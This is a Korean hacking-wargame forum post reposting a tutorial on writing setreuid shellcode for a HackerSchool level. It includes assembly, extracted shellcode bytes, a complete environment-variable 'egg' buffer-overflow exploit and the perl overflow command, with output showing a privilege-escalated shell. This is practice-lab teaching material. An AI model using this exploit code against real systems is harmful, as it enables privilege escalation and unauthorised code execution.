레벨 해킹

2844,

1/143

hackermario

[re] shellcode 어찌 만들어야 합니까?

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=681 [복사]

>shellcode 제작하는 방법을 알고 싶은데요...
>여기저기 찾고 공부하고는 있는데..
>어셈능력이 부족하서 막히네요...
>level19 에서 setreuid()의 shellcode를 만들고 있습니다.
>
>shellcode에 대하여 공부할 수 있는 곳이나
>자료가 있는 곳이 있으면 알려주시면 고맙겠습니다.....
>
>........해킹에 어셈이 필수였나요?...^^;

고생고생  하다가......좋은 자료가 있길래 ..올려봅니다...쉘코드땜에 고생하시는 분들.....도움이 되셨으면 합니다....

http://ttongfly.net 에 "night님의 setreuid() 쉘코드 만들기" 입니다..
무단으로 올려도 되는지....^^;
======================================================================
호욱이의 허접스러운 쉘코드 만들기

0x01. 서론
0x02. 본론 -step1, 2

~서론.

내가 요즘에 김선우 라는 작자 때문에 HackerSchool 레벨을 다시 시작하게되었다. 하지만 이게 무슨 일인가? 예전에
풀었던 문제가 안 풀어지는게 아닌가.. 좀 짜증이 났다. 잘못 하지도 않았고, 쉘도 제대로 떨어지는데
왜? 곧 김선우라는 놈이 알려주더라.. 그리고 신정훈 님이 제작하신 setreuid(3092, 3092) 의
쉘코드를 갖고 와서 통과하더군.. 하지만 우린 막혔다. 레벨12->13 은 어떻게 통과 할 것인가? 그래서 직접
만들어보기로 했다. 그리고 성공했다. 아직 기초적인 단계지만 기뻤다. 참고로 이 문서는 오류 가
엄.청.나.게 많다. 너그럽게 고쳐주기 바란다.

~본론.

step 1. assembly programming

난 다른 곳으로 예제를 보면서 하는걸 싫어한다..(못하는 거다 사실) 여하튼,  쉘코드 를 제작하려면 assembly
에 대한 아주 기본지식은 있어야한다. 우선 각 레지스터의 값을 알아내고.. 함수의 고유번호 알아내고..
인터럽트 호출하고.. 여기서 레지스터라 함은 eax, ebx, ecx.... 이다.

예)

main()
{
        setreuid(3092, 3092);
}

여기서 보면

eax 에는 setreuid 가 들어가고..
ebx 에는 3092
ecx 에도 3092

이런 식으로 들어간다. 주로 eax 는 함수의 고유번호를 호출 할때 쓰여 지는것 알고있다. 아닐수도? (system call)
내가 이걸 쓸 지식이 안 된다..

[level11@ftz tmp]$ cat > a.c
main()
{
        setreuid(3092, 3902);
}

이걸 어셈블리어로 프로그래밍하면 대략 이렇다.

xor %eax, %eax  // eax 0 으로 초기화
mov $0x14, %al
mov $0xc, %ah   // eax 의 부분(맞나?, al ah) 에 c14 를 넣어준다. c14는 3092 의 16진수다.
mov %eax, %ebx
mov %ebx, %ecx  // ebx 와 ecx 를 c14(3092 로 통일시켜준다)
xor %eax, %eax // eax 다시 초기화
mov $0x46, %eax // setreuid 의 고유번호인 70의 16진수. 46
int $0x80      // 인터럽트호출.

위의 al, ah 은 각각 1byte 이다.^^ (사실 필자도 확실히 모름.)

저위의 assembly 코드는 C 의

setreuid(3092, 3092); 의 코드와 같다.
   eax   ebx    ecx

생각해보면 별로 어려운 것도 아니다. 하지만 어셈블리어의 기본지식은 있어야한다.
(필자는 없다. 대충 필요한 명령들을 잠시 외워둔거뿐이다.)

step 2. shellcode 만들기

위에서 만든 코드를 갔고 이런 식으로 컴파일 한다.

[level11@ftz tmp]$ cat > setreuid.c
main(){
        __asm__("
xor %eax, %eax
mov $0x14, %al
mov $0xc, %ah
mov %eax, %ebx
mov %ebx, %ecx
xor %eax, %eax
mov $0x46, %al
int $0x80

                        ");
}
[level11@ftz tmp]$ gcc -o setreuid setreuid.c -mpreferred-stack-boundary=2

-mpreferred-stack-boundary=2 의 뜻은 stack 이 gcc 2.91 일 때의 모습으로 컴파일 하란 뜻이다.

[level11@ftz tmp]$ objdump -d setreuid

setreuid:     file format elf32-i386

... 생략 ....

080483d0 <main>:
80483d0:       55                      push   %ebp
80483d1:       89 e5                   mov    %esp,%ebp
80483d3:       31 c0                   xor    %eax,%eax
80483d5:       b0 14                   mov    $0x14,%al
80483d7:       b4 0c                   mov    $0xc,%ah
80483d9:       89 c3                   mov    %eax,%ebx
80483db:       89 d9                   mov    %ebx,%ecx
80483dd:       31 c0                   xor    %eax,%eax
80483df:       b0 46                   mov    $0x46,%al
80483e1:       cd 80                   int    $0x80
80483e3:       5d                      pop    %ebp
80483e4:       c3                      ret
80483e5:       8d 76 00                lea    0x0(%esi),%esi
80483e8:       90                      nop
80483e9:       90                      nop
80483ea:       90                      nop
80483eb:       90                      nop
80483ec:       90                      nop
80483ed:       90                      nop
80483ee:       90                      nop
80483ef:       90                      nop

... 생략 ...

이제 남은 건 쉘코드 를 저위에서 뽑기만 하면 된다. 저위의 쓰레기들만 약간 치우고..
우리가 주목 해야될것은 이 부분이다.

80483d3:       31 c0                   xor    %eax,%eax
80483d5:       b0 14                   mov    $0x14,%al
80483d7:       b4 0c                   mov    $0xc,%ah
80483d9:       89 c3                   mov    %eax,%ebx
80483db:       89 d9                   mov    %ebx,%ecx
80483dd:       31 c0                   xor    %eax,%eax
80483df:       b0 46                   mov    $0x46,%al
80483e1:       cd 80                   int    $0x80

코드와 비슷하지 않은가? 똑같다. 그저 hex code 로 출력 해준겄이다.

저기서 쉘코드 가 나온다.

"\x31\xc0\xb0\x14\xb4\x0c\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80"

하하.. 이걸 기조 쉘코드 윗부분 에 추가만 해주면 된다.
참고로 저건 HackerSchool level12( setreuid(3092, 3092) ) 쉘코드다.
시험해보겠다..^^

[level11@ftz tmp]$ cat > egg.c
#include <stdlib.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =
        "\x31\xc0\xb0\x14\xb4\x0c\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80" //added setreuid(3092, 3092) shellcode
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" // 기존 shellcode
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);

if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);

ptr = buff;

addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';

memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/bin/bash");
}
[level11@ftz tmp]$ gcc -o egg egg.c
egg.c: In function `main':
egg.c:19: warning: return type of `main' is not `int'
[level11@ftz tmp]$ ./egg
Using address: 0xbffffab8
[level11@ftz tmp]$ cd ..
[level11@ftz level11]$ perl -e 'system "./attackme","123456789012345678901234567890123456789012345678901234567890123456 78901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345
678901234567890123456789012345678901234567890123456789012345678901234567890\xb8\xfa\xff\xbf"'

sh-2.05a$ id
uid=3092(level12) gid=3091(level11) groups=3091(level11)
sh-2.05a$

성공이다. 목표달성....^^
읽어주신 모든 분들께 감사한다. 딴지 한번씩 꼭 부탁한다.. 욕은사절~

도움 주신분들

n3wb13 님
sjh21a 님

참고문헌

Willy 님의 *** How to make shellcode in linux for beginners ***

Hit : 5966 Date : 2003/11/25 07:10


kazmalee	레벨13	2004/05/02
sjoungdai	잘몰라서 따라했는데...도 안되네요 어찌 해야하는지....	2005/02/15
sjoungdai	./egg실행시 주소값이 다를수는 있겠지요?	2005/02/15
sjoungdai	마지막 perl명령어 이후 결과가 달라요 id를 치고 확인하면	2005/02/15
sjoungdai	uid=3091(level11) 그대로	2005/02/15
sjoungdai	좀 도와주세요	2005/02/15